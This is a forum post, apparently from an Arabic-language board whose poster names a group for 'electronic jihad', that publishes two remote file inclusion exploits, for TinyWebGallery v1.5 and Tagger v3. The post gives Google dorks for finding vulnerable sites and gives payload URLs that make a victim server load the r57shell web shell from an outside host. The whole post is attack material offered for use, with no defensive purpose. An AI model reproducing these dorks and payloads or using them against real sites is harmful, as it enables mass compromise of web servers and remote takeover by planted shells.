Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: exp 2


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
exp 2
Permalink   
 


بسم الله الرحمن الرحيم

ثغرتين فايل انكلود

TinyWebGallery v1.5 ( image ) Remote Include Vulnerability


google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
examples/image.php?image=http://rst.void.ru/download/r57shell.txt?

examples/examples/image.php2?image=http://rst.void.ru/download/r57shell.txt?

الثغرة الثانية

Tagger v3 <= BBCodeFile Remote file inclusion
PoC:
http://victim-site.com/tags.php?BBCo.../r57shell.txt?

Google dork:

intitle:"Tagger LE" inurl:tags.php



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard